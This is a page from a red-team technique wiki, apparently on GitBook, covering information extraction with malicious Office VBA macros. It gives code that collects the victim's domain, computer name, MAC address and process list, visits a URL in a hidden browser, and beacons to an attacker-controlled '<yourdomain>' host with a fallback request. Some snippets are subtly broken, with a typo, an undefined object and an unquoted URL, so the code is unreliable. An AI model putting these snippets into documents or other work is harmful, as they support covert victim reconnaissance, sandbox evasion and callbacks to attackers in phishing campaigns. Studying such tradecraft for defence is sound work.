The Red Team Vade Mecum
  • The Red Team Vade Mecum
  • Techniques
    • Defense Evasion
      • Binary Properties and Code Signing
      • ATA/ATP
        • Important Note
        • Intro
        • Lateral Movement
        • Domain Dominance
        • Identification
        • Recon
        • Blocking/Disabling Telemetry
          • Trusted Installer
      • Tips and Tricks
      • Basics
        • IOCs
          • High Level Overview of EDR technologies
        • Sandbox Evasion
        • Obfuscating Imports
          • Bootstrapping
        • Encrypting Strings
      • Disabling/Patching Telemetry
        • ETW Bypasses
        • AMSI Bypasses
      • Minimization
        • Commands to Avoid
        • Pivoting
        • Benefits of Using APIs
        • Thread-less Payload Execution
        • DLL Hollowing
      • Misdirection
        • Command Line Argument Spoofing
        • PPID Spoofing via CreateProcess
        • Switching Parents
          • Dechaining via WMI
      • Hiding our Payloads
        • Event Logs
        • File metadata
        • Registry Keys
        • ADS
      • IPC For Evasion and Control
    • Privilege Escalation
      • Hunting For Passwords
      • To System
        • New Service
        • Named Pipe Impersonation
        • Local Exploits
        • AlwaysInstallElevated
      • Hijacking Execution
        • Environment Variable interception
        • DLL Hijacking
      • Insecure Permissions
        • Missing Services and Tasks
        • Misconfigured Registry Hives
        • Insecure Binary Path
        • Unquoted Service Paths
    • Enumeration
      • Situational Awareness
      • Recon Commands
        • .NET AD Enum commands
        • WMIC commands
          • WMI queries from c++
    • Execution
      • Cool ways of Calling a Process
      • One Liners
    • Initial Access
      • Tips and Tricks
      • Tools
      • Staging/Stagers
      • MS Office
        • Macros
          • Evasion
            • VBA Stomping
            • Revert To Legacy Warning in Excel
            • Sandbox Evasion
          • Info Extraction
          • Inline Shapes
          • .MAM Files
          • PowerPoint
          • ACCDE
          • Shellcode Execution
          • Info Extraction
          • Dechaining Macros
        • Field Abuse
        • DDE
      • Payload Delivery
      • File Formats
        • MSG
        • RTF
        • REG
        • BAT
        • MSI Files
        • IQY
        • CHM
        • LNK
          • Using LNK to Automatically Download Payloads
        • HTA
    • Lateral Movement
      • Linux
        • SSH Hijacking
        • RDP
        • Impacket
      • No Admin?
      • Checking for access
      • Poison Handler
      • WinRM
      • AT
      • PsExec
      • WMI
      • Service Control
      • DCOM
      • RDP
      • SCShell
    • Code Injection
      • Hooking
        • Detours
      • CreateRemoteThread
      • DLL Injection
      • APC Queue Code Injection
      • Early Bird Injection
    • Persistence
      • Scheduled Tasks
        • AT
      • MS Office
      • SQL
      • Admin Level
        • SSP
        • Services
        • Default File Extension
        • AppCert DLLs
        • Time Provider
        • Waitfor
        • WinLogon
        • Netsh Dlls
        • RDP Backdoors
        • AppInit Dlls
        • Port Monitor
        • WMI Event Subscriptions
      • User Level
        • LNK
        • Startup Folder
        • Junction folders
        • Registry Keys
        • Logon Scripts
        • Powershell Profiles
        • Screen Savers
  • Infrastructure
    • SQL
      • MS SQL
        • Basics
        • Finding Sql Servers
        • Privilege Escalation
        • Post Exploitation
  • Other
    • Vulnerability Discovery
      • Web Vulnerabilities
        • Code Grepping
          • PHP Cheatsheet
    • Windows Internals
      • Unorganized Notes
Powered by GitBook
On this page
  • Extracting domain and computer name:
  • Extracting MAC and IP
  • Visit Url
  • This unhides all text
  • Get a process list
  • HTTP Request

Was this helpful?

  1. Techniques
  2. Initial Access
  3. MS Office
  4. Macros

Info Extraction

This is how we will extract information with Macros. These can be used to evade sandboxes, or to just gather information about the user.

Extracting domain and computer name:

Set wshNetwork = CreateObject("Wscript.Network")
strUserDomain = wshNetwork.UserDomain
strCompName = wshNetwork.computername

Extracting MAC and IP

set cItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPENabled = True")
For Each oItem In cItems
	If Not IsNull(oItem.IPAddress) Then myMacAddress = oItem.macAddress
	Exit Fort
Next

set objProcessSet = objWMIService.ExecQuery("Select Name, ProcessID FROM Win32_Process")
For Each Process In objProcessSet
	ProcessStr = ProcessStr & Process.Properties_("Name").Value & ":" & Process.Properties_("ProcessId").Value & "|"
Next

Visit Url

Here are some more VBA tricks, the one below visits a URL in the background

Dim objIE As Object
Set objIE = CreateObject("InternetExplorer.Application")
With objIE
    .Visible = False
    .Navigate "https://www.silentbreaksecurity.com"
    Do While .ReadyState <> 4: DoEvents: Loop
    .Quit
End With

This unhides all text

Selection.WholeStory
With Selection.Font
.Hidden = False
End With

Get a process list

Dim Service, List As Object
Set Service = GetObject("winmgmts:\\.\root\cimv2")

Set List = Service.ExecQuery ("SELECT * FROM Win32_Process")
Dim result As String
Dim Process As Object
For Each Process In List
    If Len(Process.ExecutablePath) > 0 Then
        result = result & Process.ExecutablePath & vbNewLine
    ElseIf Len(Process.name) > 0 Then
        result = result & Process.name & vbNewLine
    End If
Next

HTTP Request

Sub WebRequest()
Url = http://<yourdomain>/
On Error GoTo Request2
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
' very short timeouts, increase if you want. this is in miliseconds
objHTTP.setTimeouts 100, 100, 100, 100
'Get for example, can also be any other HTTP VERB, in case you POST, the Send method needs another argument (else you'll just post empty)

objHTTP.Open "GET", Url, False
objHTTP.Send
Set objHTTP = Nothing
Exit Sub
Request2:
'if you want you can create more error handlers, alternating url or serverxml/winhttp In case you want multiple errors you'll have to reset the error handle to -1
    On Error GoTo -1
' In case of multiple error handlers
    'On Error GoTo Request3
    'you can change your URL here if you want
    Set winHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    winHttpReq.Open "GET", Url, False
    winHttpReq.Send        
End Sub
PreviousShellcode ExecutionNextDechaining Macros

Last updated 3 years ago

Was this helpful?